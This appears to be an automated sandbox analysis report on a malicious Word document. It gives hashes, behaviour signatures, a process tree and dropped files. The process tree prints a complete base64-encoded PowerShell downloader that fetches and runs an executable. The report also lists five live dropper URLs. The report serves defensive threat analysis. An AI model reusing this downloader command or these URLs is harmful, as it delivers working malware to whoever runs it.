Analysis

  • max time kernel
    103s
  • max time network
    31s
  • platform
    windows7_x64
  • resource
    win7-20230621-en
  • resource tags

    arch:x64arch:x86image:win7-20230621-enlocale:en-usos:windows7-x64system
  • submitted
    30-06-2023 12:55

General

  • Target

    Rech_1075478616DE_Mai_23_2019.doc

  • Size

    125KB

  • MD5

    659f175cbd422379fe3a6a63c5b1f640

  • SHA1

    61af3732c39c9ec9e6b0bd1234eba2ccfe8a42e6

  • SHA256

    5d7bd5ab1f0ef9fe49f97b49fc955f64a9878fc341650143d572b24126f1284b

  • SHA512

    bfe05e59cce39f8747a0ee1186a4a4f6d8834882972bf238f0dcd6743314871df4cb11e824e382ed95cb29808e7e0d75d6ab6d3aec69532d7865171a5e50aa87

  • SSDEEP

    3072:S77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q/tr0mXSSBgfy1:S77HUUUUUUUUUUUUUUUUUUUT52V8r0mj

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://atlanticsg.com/wp-includes/fsfrz22_mkp29qlby-69478/

exe.dropper

http://eastpennlandscape.com/css/qhJUtdBFvM/

exe.dropper

http://mcs-interiors.co.uk/cgi-bin/MUbadZUIXD/

exe.dropper

http://laderajabugo.navicu.com/wp-admin/6ohv5j_6m40d-4652183/

exe.dropper

http://banphongresort.com/wp-includes/8hxbg02o_wkpvf-27459009/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Rech_1075478616DE_Mai_23_2019.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:844
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:584
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy bypass -noprofile -e JABRAG4AZgB6AGoASAB3AD0AJwBGAGkAcQBMAGwAdwAnADsAJABOAGwATQBJAGQAawAgAD0AIAAnADcAMAA2ACcAOwAkAHcAcwBOAGQAMAA1AD0AJwBYAGgAUgBpAGkATwBQAGwAJwA7ACQAdQBVAEkARQBPAGYAMgB6AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABOAGwATQBJAGQAawArACcALgBlAHgAZQAnADsAJABaAEUAdwBCAFIAUwBPAD0AJwBuAEYAcAB6AGkAdwAnADsAJABUAHAAUwA0ADYAcwA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAbwBiAGoAZQBjAHQAJwApACAAbgBgAGUAdABgAC4AdwBFAGIAQwBgAGwASQBFAE4AdAA7ACQARAB3AGIAOQB6AHMAVwA9ACcAaAB0AHQAcABzADoALwAvAGEAdABsAGEAbgB0AGkAYwBzAGcALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGYAcwBmAHIAegAyADIAXwBtAGsAcAAyADkAcQBsAGIAeQAtADYAOQA0ADcAOAAvAEAAaAB0AHQAcAA6AC8ALwBlAGEAcwB0AHAAZQBuAG4AbABhAG4AZABzAGMAYQBwAGUALgBjAG8AbQAvAGMAcwBzAC8AcQBoAEoAVQB0AGQAQgBGAHYATQAvAEAAaAB0AHQAcAA6AC8ALwBtAGMAcwAtAGkAbgB0AGUAcgBpAG8AcgBzAC4AYwBvAC4AdQBrAC8AYwBnAGkALQBiAGkAbgAvAE0AVQBiAGEAZABaAFUASQBYAEQALwBAAGgAdAB0AHAAOgAvAC8AbABhAGQAZQByAGEAagBhAGIAdQBnAG8ALgBuAGEAdgBpAGMAdQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ANgBvAGgAdgA1AGoAXwA2AG0ANAAwAGQALQA0ADYANQAyADEAOAAzAC8AQABoAHQAdABwADoALwAvAGIAYQBuAHAAaABvAG4AZwByAGUAcwBvAHIAdAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AOABoAHgAYgBnADAAMgBvAF8AdwBrAHAAdgBmAC0AMgA3ADQANQA5ADAAMAA5AC8AJwAuAHMAUABsAEkAdAAoACcAQAAnACkAOwAkAEIAUwAyAHAAbQA1AHQAPQAnAGgAegBuAFUAYQBsACcAOwBmAG8AcgBlAGEAYwBoACgAJABHAGkAbQA4AHoAXwBHAFIAIABpAG4AIAAkAEQAdwBiADkAegBzAFcAKQB7AHQAcgB5AHsAJABUAHAAUwA0ADYAcwAuAEQAbwBXAE4ATABPAEEAZABmAEkATABFACgAJABHAGkAbQA4AHoAXwBHAFIALAAgACQAdQBVAEkARQBPAGYAMgB6ACkAOwAkAEwAUQBYADYAYQA2AD0AJwBoAEoAcwB6AHMAdwAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAJwArACcAbQAnACkAIAAkAHUAVQBJAEUATwBmADIAegApAC4ATABFAE4ARwB0AEgAIAAtAGcAZQAgADMAMwA2ADkAOQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAcwB0AEEAcgB0ACgAJAB1AFUASQBFAE8AZgAyAHoAKQA7ACQATABTAEkAMwA0AEsARgA9ACcAaABjAEgANwBWAGYAJwA7AGIAcgBlAGEAawA7ACQATwBoADUAdABtAFkAbQA9ACcAbgBBADQAaQAyAEcAYQB1ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAWQBVAEYAUwBqAD0AJwBvAEcAcwB3AE4AdQAnAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2032

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      6408dcf48198279e4ac4a709417a4a31

      SHA1

      a04f010a6538546e267f374a8013289ab2bd2ef7

      SHA256

      76d858a095ffa12ca2f2dc395d907b9631804f450f1b21d0b811018ef43653e1

      SHA512

      f808627c37bd8ac570c21595b2175b0c72aec1ae4b3ccf39c63bd2fc27f7dda89181ccdef2220f84ef457c49b12e30e357d97bdc4591e35113b94c7de3330eb3

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\49E7E721.wmf
      Filesize

      444B

      MD5

      7d156a783014020b9d740608aab36c77

      SHA1

      a20eb97255f5af3118ce7335ccd88d53e6e05586

      SHA256

      1c8ab0b192ca9881610f985ec165baab30df4cc318b0db2393fce68da6df62b9

      SHA512

      6f74d008e56c4df75480ee6e95f7b876fcd1825f749d27c01afc14eb6ebe346fd0f3a26e488a91c4a85a82fca83404ca41e63d526552ed306b0591160a4b2c95

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AD0AA95B.wmf
      Filesize

      444B

      MD5

      6c18ded915c048bb38971713717c14ec

      SHA1

      183b7e8e2d092a136fc80588c47a622f572d1657

      SHA256

      955ff24d699643a2819b094548e8afc8b07c684f009572dc0f43e36dfe13d263

      SHA512

      686aeaef036377de15750cf5a9646c8c4afa5d8f6a5d75d16489d4d00aef0afc8c3b84306b7f532496ce53b771055e3a32621ca1c2d13156a66d5946680483ff

    • C:\Users\Admin\AppData\Local\Temp\Cab8539.tmp
      Filesize

      62KB

      MD5

      3ac860860707baaf32469fa7cc7c0192

      SHA1

      c33c2acdaba0e6fa41fd2f00f186804722477639

      SHA256

      d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

      SHA512

      d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

    • C:\Users\Admin\AppData\Local\Temp\Tar85B9.tmp
      Filesize

      164KB

      MD5

      4ff65ad929cd9a367680e0e5b1c08166

      SHA1

      c0af0d4396bd1f15c45f39d3b849ba444233b3a2

      SHA256

      c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

      SHA512

      f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      7a8a2e8d6513a3a9455d90fa7e2f426e

      SHA1

      ac59de8f44390405325f8d7b27c7d9c62bf4fee8

      SHA256

      4b0feb99f218ac447d70d562d7b03e8494069299ab10379511ebf3ad0b82fc59

      SHA512

      c12b19c078af1cb5cf58c12647417e6ae20711ba459e16fa7532740e57dca0f04acd330fb96c9c35707993a92df57b6f776f4911c2b9baf332792163bf98fd41

    • memory/844-74-0x00000000006C0000-0x00000000007C0000-memory.dmp
      Filesize

      1024KB

    • memory/844-75-0x00000000006C0000-0x00000000007C0000-memory.dmp
      Filesize

      1024KB

    • memory/844-78-0x00000000006C0000-0x00000000007C0000-memory.dmp
      Filesize

      1024KB

    • memory/844-83-0x00000000006C0000-0x00000000007C0000-memory.dmp
      Filesize

      1024KB

    • memory/844-54-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/844-193-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/844-73-0x00000000006C0000-0x00000000007C0000-memory.dmp
      Filesize

      1024KB

    • memory/844-72-0x00000000006C0000-0x00000000007C0000-memory.dmp
      Filesize

      1024KB

    • memory/844-65-0x0000000006410000-0x0000000006510000-memory.dmp
      Filesize

      1024KB

    • memory/2032-91-0x000000001B220000-0x000000001B502000-memory.dmp
      Filesize

      2.9MB

    • memory/2032-96-0x00000000027E0000-0x0000000002860000-memory.dmp
      Filesize

      512KB

    • memory/2032-95-0x00000000027E0000-0x0000000002860000-memory.dmp
      Filesize

      512KB

    • memory/2032-94-0x00000000027E0000-0x0000000002860000-memory.dmp
      Filesize

      512KB

    • memory/2032-93-0x00000000027E0000-0x0000000002860000-memory.dmp
      Filesize

      512KB

    • memory/2032-92-0x0000000001F40000-0x0000000001F48000-memory.dmp
      Filesize

      32KB